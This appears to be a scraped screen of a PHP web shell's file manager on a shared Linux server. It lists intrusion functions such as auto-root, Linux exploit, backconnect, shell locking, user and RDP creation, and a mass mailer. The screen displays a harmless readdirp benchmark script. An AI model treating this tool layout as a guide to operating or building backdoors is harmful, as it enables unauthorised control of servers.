Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-readdirp /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
bench.js
731
B
-rw-r--r--
grep.js
1.46
KB
-rw-r--r--
list.js
733
B
-rw-r--r--
types.ts
578
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bench.js
/* eslint-disable no-unused-vars */ 'use strict'; const readdirp = require('..'); function logMem(i) { const vals = Object.entries(process.memoryUsage()).map(([k, v]) => { return `${k}=${(`${(v / 1e6).toFixed(1)}M`).padEnd(7)}`; }); console.log(String(i).padStart(6), ...vals); } const read = async (directory) => { const stream = readdirp(directory, {type: 'all'}); let i = 0; const start = Date.now(); let lap = 0; for await (const chunk of stream) { if (i % 1000 === 0) { const now = Date.now(); if (now - lap > 500) { lap = now; logMem(i); } } i++; } logMem(i); console.log(`Processed ${i} files in ${Date.now() - start} msecs`); }; read('../..');
Close